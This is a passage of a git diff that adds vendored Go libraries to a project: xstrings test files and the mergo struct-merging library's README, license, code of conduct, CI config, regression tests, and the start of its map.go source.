MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "fmt" + "strings" + "testing" +) + +func TestTranslate(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + return Translate(input[0], input[1], input[2]) + } + + runTestCases(t, runner, _M{ + sep("hello", "aeiou", "12345"): "h2ll4", + sep("hello", "aeiou", ""): "hll", + sep("hello", "a-z", "A-Z"): "HELLO", + sep("hello", "z-a", "a-z"): "svool", + sep("hello", "aeiou", "*"): "h*ll*", + sep("hello", "^l", "*"): "**ll*", + sep("hello", "p-z", "*"): "hello", + sep("hello ^ world", `\^lo`, "*"): "he*** * w*r*d", + + sep("中文字符测试", "文中谁敢试?", "123456"): "21字符测5", + sep("中文字符测试", "^文中谁敢试?", "123456"): "中文666试", + sep("中文字符测试", "字-试", "0-9"): "中90999", + + sep("h1e2l3l4o, w5o6r7l8d", "a-z,0-9", `A-Z\-a-czk-p`): "HbEcLzLkO- WlOmRnLoD", + sep("h1e2l3l4o, w5o6r7l8d", "a-zoh-n", "b-zakt-z"): "t1f2x3x4k, x5k6s7x8e", + sep("h1e2l3l4o, w5o6r7l8d", "helloa-zoh-n", "99999b-zakt-z"): "t1f2x3x4k, x5k6s7x8e", + + sep("hello", "e-", "p"): "hpllo", + sep("hello", "-e-", "p"): "hpllo", + sep("hello", "----e---", "p"): "hpllo", + sep("hello", "^---e----", "p"): "peppp", + + sep("hel\uFFFDlo", "\uFFFD", "H"): "helHlo", + sep("hel\uFFFDlo", "^\uFFFD", "H"): "HHHHH", + sep("hel\uFFFDlo", "o-\uFFFDh", "H"): "HelHlH", + }) +} + +func TestDelete(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + return Delete(input[0], input[1]) + } + + runTestCases(t, runner, _M{ + sep("hello", "aeiou"): "hll", + sep("hello", "a-k"): "llo", + sep("hello", "^a-k"): "he", + + sep("中文字符测试", "文中谁敢试?"): "字符测", + }) +} + +func TestCount(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + return fmt.Sprint(Count(input[0], input[1])) + } + + runTestCases(t, runner, _M{ + sep("hello", "aeiou"): "2", + sep("hello", "a-k"): "2", + sep("hello", "^a-k"): "3", + + sep("中文字符测试", "文中谁敢试?"): "3", + }) +} + +func TestSqueeze(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + return Squeeze(input[0], input[1]) + } + + runTestCases(t, runner, _M{ + sep("hello", ""): "helo", + sep("hello world", ""): "helo world", + sep("hello world", " "): "hello world", + sep("hello world", " "): "hello world", + sep("hello", "a-k"): "hello", + sep("hello", "^a-k"): "helo", + sep("hello", "^a-l"): "hello", + sep("foooo baaaaar", "a"): "foooo bar", + + sep("打打打打个劫!!", ""): "打个劫!", + sep("打打打打个劫!!", "打"): "打个劫!!", + }) +} diff --git a/vendor/github.com/huandu/xstrings/util_test.go b/vendor/github.com/huandu/xstrings/util_test.go new file mode 100644 index 0000000000..1c1bebea00 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/util_test.go @@ -0,0 +1,33 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "strings" + "testing" +) + +type _M map[string]string + +const ( + separator = " ¶ " +) + +func runTestCases(t *testing.T, converter func(string) string, cases map[string]string) { + for k, v := range cases { + s := converter(k) + + if s != v { + t.Fatalf("case fails. [case:%v]\nshould => %#v\nactual => %#v", k, v, s) + } + } +} + +func sep(strs ...string) string { + return strings.Join(strs, separator) +} + +func split(str string) []string { + return strings.Split(str, separator) +} diff --git a/vendor/github.com/imdario/mergo/.gitignore b/vendor/github.com/imdario/mergo/.gitignore new file mode 100644 index 0000000000..529c3412ba --- /dev/null +++ b/vendor/github.com/imdario/mergo/.gitignore @@ -0,0 +1,33 @@ +#### joe made this: http://goel.io/joe + +#### go #### +# Binaries for programs and plugins +*.exe +*.dll +*.so +*.dylib + +# Test binary, build with `go test -c` +*.test + +# Output of the go coverage tool, specifically when used with LiteIDE +*.out + +# Project-local glide cache, RE: https://github.com/Masterminds/glide/issues/736 +.glide/ + +#### vim #### +# Swap +[._]*.s[a-v][a-z] +[._]*.sw[a-p] +[._]s[a-v][a-z] +[._]sw[a-p] + +# Session +Session.vim + +# Temporary +.netrwhist +*~ +# Auto-generated tag files +tags diff --git a/vendor/github.com/imdario/mergo/.travis.yml b/vendor/github.com/imdario/mergo/.travis.yml new file mode 100644 index 0000000000..b13a50ed1f --- /dev/null +++ b/vendor/github.com/imdario/mergo/.travis.yml @@ -0,0 +1,7 @@ +language: go +install: + - go get -t + - go get golang.org/x/tools/cmd/cover + - go get github.com/mattn/goveralls +script: + - $HOME/gopath/bin/goveralls -service=travis-ci -repotoken $COVERALLS_TOKEN diff --git a/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md b/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md new file mode 100644 index 0000000000..469b44907a --- /dev/null +++ b/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md @@ -0,0 +1,46 @@ +# Contributor Covenant Code of Conduct + +## Our Pledge + +In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. + +## Our Standards + +Examples of behavior that contributes to creating a positive environment include: + +* Using welcoming and inclusive language +* Being respectful of differing viewpoints and experiences +* Gracefully accepting constructive criticism +* Focusing on what is best for the community +* Showing empathy towards other community members + +Examples of unacceptable behavior by participants include: + +* The use of sexualized language or imagery and unwelcome sexual attention or advances +* Trolling, insulting/derogatory comments, and personal or political attacks +* Public or private harassment +* Publishing others' private information, such as a physical or electronic address, without explicit permission +* Other conduct which could reasonably be considered inappropriate in a professional setting + +## Our Responsibilities + +Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. + +Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. + +## Scope + +This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. + +## Enforcement + +Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at i@dario.im. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. + +Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. + +## Attribution + +This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] + +[homepage]: http://contributor-covenant.org +[version]: http://contributor-covenant.org/version/1/4/ diff --git a/vendor/github.com/imdario/mergo/LICENSE b/vendor/github.com/imdario/mergo/LICENSE new file mode 100644 index 0000000000..686680298d --- /dev/null +++ b/vendor/github.com/imdario/mergo/LICENSE @@ -0,0 +1,28 @@ +Copyright (c) 2013 Dario Castañé. All rights reserved. +Copyright (c) 2012 The Go Authors. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/github.com/imdario/mergo/README.md b/vendor/github.com/imdario/mergo/README.md new file mode 100644 index 0000000000..d1cefa8718 --- /dev/null +++ b/vendor/github.com/imdario/mergo/README.md @@ -0,0 +1,222 @@ +# Mergo + +A helper to merge structs and maps in Golang. Useful for configuration default values, avoiding messy if-statements. + +Also a lovely [comune](http://en.wikipedia.org/wiki/Mergo) (municipality) in the Province of Ancona in the Italian region of Marche. + +## Status + +It is ready for production use. [It is used in several projects by Docker, Google, The Linux Foundation, VMWare, Shopify, etc](https://github.com/imdario/mergo#mergo-in-the-wild). + +[![GoDoc][3]][4] +[![GoCard][5]][6] +[![Build Status][1]][2] +[![Coverage Status][7]][8] +[![Sourcegraph][9]][10] + +[1]: https://travis-ci.org/imdario/mergo.png +[2]: https://travis-ci.org/imdario/mergo +[3]: https://godoc.org/github.com/imdario/mergo?status.svg +[4]: https://godoc.org/github.com/imdario/mergo +[5]: https://goreportcard.com/badge/imdario/mergo +[6]: https://goreportcard.com/report/github.com/imdario/mergo +[7]: https://coveralls.io/repos/github/imdario/mergo/badge.svg?branch=master +[8]: https://coveralls.io/github/imdario/mergo?branch=master +[9]: https://sourcegraph.com/github.com/imdario/mergo/-/badge.svg +[10]: https://sourcegraph.com/github.com/imdario/mergo?badge + +### Latest release + +[Release v0.3.4](https://github.com/imdario/mergo/releases/tag/v0.3.4). + +### Important note + +Please keep in mind that in [0.3.2](//github.com/imdario/mergo/releases/tag/0.3.2) Mergo changed `Merge()`and `Map()` signatures to support [transformers](#transformers). An optional/variadic argument has been added, so it won't break existing code. + +If you were using Mergo **before** April 6th 2015, please check your project works as intended after updating your local copy with ```go get -u github.com/imdario/mergo```. I apologize for any issue caused by its previous behavior and any future bug that Mergo could cause (I hope it won't!) in existing projects after the change (release 0.2.0). + +### Donations + +If Mergo is useful to you, consider buying me a coffee, a beer or making a monthly donation so I can keep building great free software. :heart_eyes: + +Buy Me a Coffee at ko-fi.com +[![Beerpay](https://beerpay.io/imdario/mergo/badge.svg)](https://beerpay.io/imdario/mergo) +[![Beerpay](https://beerpay.io/imdario/mergo/make-wish.svg)](https://beerpay.io/imdario/mergo) +Donate using Liberapay + +### Mergo in the wild + +- [moby/moby](https://github.com/moby/moby) +- [kubernetes/kubernetes](https://github.com/kubernetes/kubernetes) +- [vmware/dispatch](https://github.com/vmware/dispatch) +- [Shopify/themekit](https://github.com/Shopify/themekit) +- [imdario/zas](https://github.com/imdario/zas) +- [matcornic/hermes](https://github.com/matcornic/hermes) +- [OpenBazaar/openbazaar-go](https://github.com/OpenBazaar/openbazaar-go) +- [kataras/iris](https://github.com/kataras/iris) +- [michaelsauter/crane](https://github.com/michaelsauter/crane) +- [go-task/task](https://github.com/go-task/task) +- [sensu/uchiwa](https://github.com/sensu/uchiwa) +- [ory/hydra](https://github.com/ory/hydra) +- [sisatech/vcli](https://github.com/sisatech/vcli) +- [dairycart/dairycart](https://github.com/dairycart/dairycart) +- [projectcalico/felix](https://github.com/projectcalico/felix) +- [resin-os/balena](https://github.com/resin-os/balena) +- [go-kivik/kivik](https://github.com/go-kivik/kivik) +- [Telefonica/govice](https://github.com/Telefonica/govice) +- [supergiant/supergiant](supergiant/supergiant) +- [SergeyTsalkov/brooce](https://github.com/SergeyTsalkov/brooce) +- [soniah/dnsmadeeasy](https://github.com/soniah/dnsmadeeasy) +- [ohsu-comp-bio/funnel](https://github.com/ohsu-comp-bio/funnel) +- [EagerIO/Stout](https://github.com/EagerIO/Stout) +- [lynndylanhurley/defsynth-api](https://github.com/lynndylanhurley/defsynth-api) +- [russross/canvasassignments](https://github.com/russross/canvasassignments) +- [rdegges/cryptly-api](https://github.com/rdegges/cryptly-api) +- [casualjim/exeggutor](https://github.com/casualjim/exeggutor) +- [divshot/gitling](https://github.com/divshot/gitling) +- [RWJMurphy/gorl](https://github.com/RWJMurphy/gorl) +- [andrerocker/deploy42](https://github.com/andrerocker/deploy42) +- [elwinar/rambler](https://github.com/elwinar/rambler) +- [tmaiaroto/gopartman](https://github.com/tmaiaroto/gopartman) +- [jfbus/impressionist](https://github.com/jfbus/impressionist) +- [Jmeyering/zealot](https://github.com/Jmeyering/zealot) +- [godep-migrator/rigger-host](https://github.com/godep-migrator/rigger-host) +- [Dronevery/MultiwaySwitch-Go](https://github.com/Dronevery/MultiwaySwitch-Go) +- [thoas/picfit](https://github.com/thoas/picfit) +- [mantasmatelis/whooplist-server](https://github.com/mantasmatelis/whooplist-server) +- [jnuthong/item_search](https://github.com/jnuthong/item_search) +- [bukalapak/snowboard](https://github.com/bukalapak/snowboard) + +## Installation + + go get github.com/imdario/mergo + + // use in your .go code + import ( + "github.com/imdario/mergo" + ) + +## Usage + +You can only merge same-type structs with exported fields initialized as zero value of their type and same-types maps. Mergo won't merge unexported (private) fields but will do recursively any exported one. It won't merge empty structs value as [they are not considered zero values](https://golang.org/ref/spec#The_zero_value) either. Also maps will be merged recursively except for structs inside maps (because they are not addressable using Go reflection). + +```go +if err := mergo.Merge(&dst, src); err != nil { + // ... +} +``` + +Also, you can merge overwriting values using the transformer `WithOverride`. + +```go +if err := mergo.Merge(&dst, src, mergo.WithOverride); err != nil { + // ... +} +``` + +Additionally, you can map a `map[string]interface{}` to a struct (and otherwise, from struct to map), following the same restrictions as in `Merge()`. Keys are capitalized to find each corresponding exported field. + +```go +if err := mergo.Map(&dst, srcMap); err != nil { + // ... +} +``` + +Warning: if you map a struct to map, it won't do it recursively. Don't expect Mergo to map struct members of your struct as `map[string]interface{}`. They will be just assigned as values. + +More information and examples in [godoc documentation](http://godoc.org/github.com/imdario/mergo). + +### Nice example + +```go +package main + +import ( + "fmt" + "github.com/imdario/mergo" +) + +type Foo struct { + A string + B int64 +} + +func main() { + src := Foo{ + A: "one", + B: 2, + } + dest := Foo{ + A: "two", + } + mergo.Merge(&dest, src) + fmt.Println(dest) + // Will print + // {two 2} +} +``` + +Note: if test are failing due missing package, please execute: + + go get gopkg.in/yaml.v2 + +### Transformers + +Transformers allow to merge specific types differently than in the default behavior. In other words, now you can customize how some types are merged. For example, `time.Time` is a struct; it doesn't have zero value but IsZero can return true because it has fields with zero value. How can we merge a non-zero `time.Time`? + +```go +package main + +import ( + "fmt" + "github.com/imdario/mergo" + "reflect" + "time" +) + +type timeTransfomer struct { +} + +func (t timeTransfomer) Transformer(typ reflect.Type) func(dst, src reflect.Value) error { + if typ == reflect.TypeOf(time.Time{}) { + return func(dst, src reflect.Value) error { + if dst.CanSet() { + isZero := dst.MethodByName("IsZero") + result := isZero.Call([]reflect.Value{}) + if result[0].Bool() { + dst.Set(src) + } + } + return nil + } + } + return nil +} + +type Snapshot struct { + Time time.Time + // ... +} + +func main() { + src := Snapshot{time.Now()} + dest := Snapshot{} + mergo.Merge(&dest, src, mergo.WithTransformers(timeTransfomer{})) + fmt.Println(dest) + // Will print + // { 2018-01-12 01:15:00 +0000 UTC m=+0.000000001 } +} +``` + + +## Contact me + +If I can help you, you have an idea or you are using Mergo in your projects, don't hesitate to drop me a line (or a pull request): [@im_dario](https://twitter.com/im_dario) + +## About + +Written by [Dario Castañé](http://dario.im). + +## License + +[BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) license, as [Go language](http://golang.org/LICENSE). diff --git a/vendor/github.com/imdario/mergo/doc.go b/vendor/github.com/imdario/mergo/doc.go new file mode 100644 index 0000000000..6e9aa7baf3 --- /dev/null +++ b/vendor/github.com/imdario/mergo/doc.go @@ -0,0 +1,44 @@ +// Copyright 2013 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +/* +Package mergo merges same-type structs and maps by setting default values in zero-value fields. + +Mergo won't merge unexported (private) fields but will do recursively any exported one. It also won't merge structs inside maps (because they are not addressable using Go reflection). + +Usage + +From my own work-in-progress project: + + type networkConfig struct { + Protocol string + Address string + ServerType string `json: "server_type"` + Port uint16 + } + + type FssnConfig struct { + Network networkConfig + } + + var fssnDefault = FssnConfig { + networkConfig { + "tcp", + "127.0.0.1", + "http", + 31560, + }, + } + + // Inside a function [...] + + if err := mergo.Merge(&config, fssnDefault); err != nil { + log.Fatal(err) + } + + // More code [...] + +*/ +package mergo diff --git a/vendor/github.com/imdario/mergo/issue17_test.go b/vendor/github.com/imdario/mergo/issue17_test.go new file mode 100644 index 0000000000..f9de805ab7 --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue17_test.go @@ -0,0 +1,25 @@ +package mergo + +import ( + "encoding/json" + "testing" +) + +var ( + request = `{"timestamp":null, "name": "foo"}` + maprequest = map[string]interface{}{ + "timestamp": nil, + "name": "foo", + "newStuff": "foo", + } +) + +func TestIssue17MergeWithOverwrite(t *testing.T) { + var something map[string]interface{} + if err := json.Unmarshal([]byte(request), &something); err != nil { + t.Errorf("Error while Unmarshalling maprequest: %s", err) + } + if err := MergeWithOverwrite(&something, maprequest); err != nil { + t.Errorf("Error while merging: %s", err) + } +} diff --git a/vendor/github.com/imdario/mergo/issue23_test.go b/vendor/github.com/imdario/mergo/issue23_test.go new file mode 100644 index 0000000000..283f8c6a3f --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue23_test.go @@ -0,0 +1,27 @@ +package mergo + +import ( + "testing" + "time" +) + +type document struct { + Created *time.Time +} + +func TestIssue23MergeWithOverwrite(t *testing.T) { + now := time.Now() + dst := document{ + &now, + } + expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC) + src := document{ + &expected, + } + if err := MergeWithOverwrite(&dst, src); err != nil { + t.Errorf("Error while merging %s", err) + } + if !dst.Created.Equal(*src.Created) { //--> https://golang.org/pkg/time/#pkg-overview + t.Fatalf("Created not merged in properly: dst.Created(%v) != src.Created(%v)", dst.Created, src.Created) + } +} diff --git a/vendor/github.com/imdario/mergo/issue33_test.go b/vendor/github.com/imdario/mergo/issue33_test.go new file mode 100644 index 0000000000..ae55ae236f --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue33_test.go @@ -0,0 +1,33 @@ +package mergo + +import ( + "testing" +) + +type Foo struct { + Str string + Bslice []byte +} + +func TestIssue33Merge(t *testing.T) { + dest := Foo{Str: "a"} + toMerge := Foo{ + Str: "b", + Bslice: []byte{1, 2}, + } + if err := Merge(&dest, toMerge); err != nil { + t.Errorf("Error while merging: %s", err) + } + // Merge doesn't overwrite an attribute if in destination it doesn't have a zero value. + // In this case, Str isn't a zero value string. + if dest.Str != "a" { + t.Errorf("dest.Str should have not been override as it has a non-zero value: dest.Str(%v) != 'a'", dest.Str) + } + // If we want to override, we must use MergeWithOverwrite or Merge using WithOverride. + if err := Merge(&dest, toMerge, WithOverride); err != nil { + t.Errorf("Error while merging: %s", err) + } + if dest.Str != toMerge.Str { + t.Errorf("dest.Str should have been override: dest.Str(%v) != toMerge.Str(%v)", dest.Str, toMerge.Str) + } +} diff --git a/vendor/github.com/imdario/mergo/issue38_test.go b/vendor/github.com/imdario/mergo/issue38_test.go new file mode 100644 index 0000000000..286b68cb1c --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue38_test.go @@ -0,0 +1,59 @@ +package mergo + +import ( + "testing" + "time" +) + +type structWithoutTimePointer struct { + Created time.Time +} + +func TestIssue38Merge(t *testing.T) { + dst := structWithoutTimePointer{ + time.Now(), + } + + expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC) + src := structWithoutTimePointer{ + expected, + } + if err := Merge(&dst, src); err != nil { + t.Errorf("Error while merging %s", err) + } + if dst.Created == src.Created { + t.Fatalf("Created merged unexpectedly: dst.Created(%v) == src.Created(%v)", dst.Created, src.Created) + } +} + +func TestIssue38MergeEmptyStruct(t *testing.T) { + dst := structWithoutTimePointer{} + + expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC) + src := structWithoutTimePointer{ + expected, + } + if err := Merge(&dst, src); err != nil { + t.Errorf("Error while merging %s", err) + } + if dst.Created == src.Created { + t.Fatalf("Created merged unexpectedly: dst.Created(%v) == src.Created(%v)", dst.Created, src.Created) + } +} + +func TestIssue38MergeWithOverwrite(t *testing.T) { + dst := structWithoutTimePointer{ + time.Now(), + } + + expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC) + src := structWithoutTimePointer{ + expected, + } + if err := MergeWithOverwrite(&dst, src); err != nil { + t.Errorf("Error while merging %s", err) + } + if dst.Created != src.Created { + t.Fatalf("Created not merged in properly: dst.Created(%v) != src.Created(%v)", dst.Created, src.Created) + } +} diff --git a/vendor/github.com/imdario/mergo/issue50_test.go b/vendor/github.com/imdario/mergo/issue50_test.go new file mode 100644 index 0000000000..89aa36345c --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue50_test.go @@ -0,0 +1,18 @@ +package mergo + +import ( + "testing" + "time" +) + +type testStruct struct { + time.Duration +} + +func TestIssue50Merge(t *testing.T) { + to := testStruct{} + from := testStruct{} + if err := Merge(&to, from); err != nil { + t.Fail() + } +} diff --git a/vendor/github.com/imdario/mergo/issue52_test.go b/vendor/github.com/imdario/mergo/issue52_test.go new file mode 100644 index 0000000000..62cd9fa7c0 --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue52_test.go @@ -0,0 +1,99 @@ +package mergo + +import ( + "reflect" + "testing" + "time" +) + +type structWithTime struct { + Birth time.Time +} + +type timeTransfomer struct { + overwrite bool +} + +func (t timeTransfomer) Transformer(typ reflect.Type) func(dst, src reflect.Value) error { + if typ == reflect.TypeOf(time.Time{}) { + return func(dst, src reflect.Value) error { + if dst.CanSet() { + if t.overwrite { + isZero := src.MethodByName("IsZero") + result := isZero.Call([]reflect.Value{}) + if !result[0].Bool() { + dst.Set(src) + } + } else { + isZero := dst.MethodByName("IsZero") + result := isZero.Call([]reflect.Value{}) + if result[0].Bool() { + dst.Set(src) + } + } + } + return nil + } + } + return nil +} + +func TestOverwriteZeroSrcTime(t *testing.T) { + now := time.Now() + dst := structWithTime{now} + src := structWithTime{} + if err := MergeWithOverwrite(&dst, src); err != nil { + t.FailNow() + } + if !dst.Birth.IsZero() { + t.Fatalf("dst should have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now) + } +} + +func TestOverwriteZeroSrcTimeWithTransformer(t *testing.T) { + now := time.Now() + dst := structWithTime{now} + src := structWithTime{} + if err := MergeWithOverwrite(&dst, src, WithTransformers(timeTransfomer{true})); err != nil { + t.FailNow() + } + if dst.Birth.IsZero() { + t.Fatalf("dst should not have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now) + } +} + +func TestOverwriteZeroDstTime(t *testing.T) { + now := time.Now() + dst := structWithTime{} + src := structWithTime{now} + if err := MergeWithOverwrite(&dst, src); err != nil { + t.FailNow() + } + if dst.Birth.IsZero() { + t.Fatalf("dst should have been overwritten: dst.Birth(%v) != zero(%v)", dst.Birth, time.Time{}) + } +} + +func TestZeroDstTime(t *testing.T) { + now := time.Now() + dst := structWithTime{} + src := structWithTime{now} + if err := Merge(&dst, src); err != nil { + t.FailNow() + } + if !dst.Birth.IsZero() { + t.Fatalf("dst should not have been overwritten: dst.Birth(%v) != zero(%v)", dst.Birth, time.Time{}) + } +} + +func TestZeroDstTimeWithTransformer(t *testing.T) { + now := time.Now() + dst := structWithTime{} + src := structWithTime{now} + if err := Merge(&dst, src, WithTransformers(timeTransfomer{})); err != nil { + t.FailNow() + } + if dst.Birth.IsZero() { + t.Fatalf("dst should have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now) + } +} diff --git a/vendor/github.com/imdario/mergo/issue61_test.go b/vendor/github.com/imdario/mergo/issue61_test.go new file mode 100644 index 0000000000..8efa5e4570 --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue61_test.go @@ -0,0 +1,20 @@ +package mergo + +import ( + "reflect" + "testing" +) + +func TestIssue61MergeNilMap(t *testing.T) { + type T struct { + I map[string][]string + } + t1 := T{} + t2 := T{I: map[string][]string{"hi": {"there"}}} + if err := Merge(&t1, t2); err != nil { + t.Fail() + } + if !reflect.DeepEqual(t2, T{I: map[string][]string{"hi": {"there"}}}) { + t.FailNow() + } +} diff --git a/vendor/github.com/imdario/mergo/issue64_test.go b/vendor/github.com/imdario/mergo/issue64_test.go new file mode 100644 index 0000000000..32382bef16 --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue64_test.go @@ -0,0 +1,38 @@ +package mergo + +import ( + "testing" +) + +type Student struct { + Name string + Books []string +} + +var testData = []struct { + S1 Student + S2 Student + ExpectedSlice []string +}{ + {Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{"1"}}, []string{"a", "B"}}, + {Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{}}, []string{"a", "B"}}, + {Student{"Jack", []string{}}, Student{"Tom", []string{"1"}}, []string{"1"}}, + {Student{"Jack", []string{}}, Student{"Tom", []string{}}, []string{}}, +} + +func TestIssue64MergeSliceWithOverride(t *testing.T) { + for _, data := range testData { + err := Merge(&data.S2, data.S1, WithOverride) + if err != nil { + t.Errorf("Error while merging %s", err) + } + if len(data.S2.Books) != len(data.ExpectedSlice) { + t.Fatalf("Got %d elements in slice, but expected %d", len(data.S2.Books), len(data.ExpectedSlice)) + } + for i, val := range data.S2.Books { + if val != data.ExpectedSlice[i] { + t.Fatalf("Expected %s, but got %s while merging slice with override", data.ExpectedSlice[i], val) + } + } + } +} diff --git a/vendor/github.com/imdario/mergo/issue66_test.go b/vendor/github.com/imdario/mergo/issue66_test.go new file mode 100644 index 0000000000..9e4bccedcb --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue66_test.go @@ -0,0 +1,48 @@ +package mergo + +import ( + "testing" +) + +type PrivateSliceTest66 struct { + PublicStrings []string + privateStrings []string +} + +func TestPrivateSlice(t *testing.T) { + p1 := PrivateSliceTest66{ + PublicStrings: []string{"one", "two", "three"}, + privateStrings: []string{"four", "five"}, + } + p2 := PrivateSliceTest66{ + PublicStrings: []string{"six", "seven"}, + } + if err := Merge(&p1, p2); err != nil { + t.Fatalf("Error during the merge: %v", err) + } + if len(p1.PublicStrings) != 3 { + t.Error("5 elements should be in 'PublicStrings' field") + } + if len(p1.privateStrings) != 2 { + t.Error("2 elements should be in 'privateStrings' field") + } +} + +func TestPrivateSliceWithAppendSlice(t *testing.T) { + p1 := PrivateSliceTest66{ + PublicStrings: []string{"one", "two", "three"}, + privateStrings: []string{"four", "five"}, + } + p2 := PrivateSliceTest66{ + PublicStrings: []string{"six", "seven"}, + } + if err := Merge(&p1, p2, WithAppendSlice); err != nil { + t.Fatalf("Error during the merge: %v", err) + } + if len(p1.PublicStrings) != 5 { + t.Error("5 elements should be in 'PublicStrings' field") + } + if len(p1.privateStrings) != 2 { + t.Error("2 elements should be in 'privateStrings' field") + } +} diff --git a/vendor/github.com/imdario/mergo/map.go b/vendor/github.com/imdario/mergo/map.go new file mode 100644 index 0000000000..6ea38e636b --- /dev/null +++ b/vendor/github.com/imdario/mergo/map.go @@ -0,0 +1,174 @@ +// Copyright 2014 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// Based on src/pkg/reflect/deepequal.go from official +// golang's stdlib. + +package mergo + +import ( + "fmt" + "reflect" + "unicode" + "unicode/utf8" +) + +func changeInitialCase(s string, mapper func(rune) rune) string { + if s == "" { + return s + } + r, n := utf8.DecodeRuneInString(s) + return string(mapper(r)) + s[n:] +} + +func isExported(field reflect.StructField) bool { + r, _ := utf8.DecodeRuneInString(field.Name) + return r >= 'A' && r <= 'Z' +} + +// Traverses recursively both values, assigning src's fields values to dst. +// The map argument tracks comparisons that have already been seen, which allows +// short circuiting on recursive types. +func deepMap(dst, src reflect.Value, visited map[uintptr]*visit, depth int, config *Config) (err error) { + overwrite := config.Overwrite + if dst.CanAddr() { + addr := dst.UnsafeAddr() + h := 17 * addr + seen := visited[h] + typ := dst.Type() + for p := seen; p != nil; p = p.next { + if p.ptr == addr && p.typ == typ { + return nil + } + } + // Remember, remember... + visited[h] = &visit{addr, typ, seen} + } + zeroValue := reflect.Value{} + switch dst.Kind() { + case reflect.Map: + dstMap := dst.Interface().(map[string]interface{}) + for i, n := 0, src.NumField(); i < n; i++ { + srcType := src.Type() + field := srcType.Field(i) + if !isExported(field) { + continue + } + fieldName := field.Name + fieldName = changeInitialCase(fieldName, unicode.ToLower) + if v, ok := dstMap[fieldName]; !ok || (isEmptyValue(reflect.ValueOf(v)) || overwrite) { + dstMap[fieldName] = src.Field(i).Interface() + } + } + case reflect.Ptr: + if dst.IsNil() { + v := reflect.New(dst.Type().Elem()) + dst.Set(v) + } + dst = dst.Elem() + fallthrough + case reflect.Struct: + srcMap := src.Interface().(map[string]interface{}) + for key := range srcMap { + srcValue := srcMap[key] + fieldName := changeInitialCase(key, unicode.ToUpper) + dstElement := dst.FieldByName(fieldName) + if dstElement == zeroValue { + // We discard it because the field doesn't exist. + continue + } + srcElement := reflect.ValueOf(srcValue) + 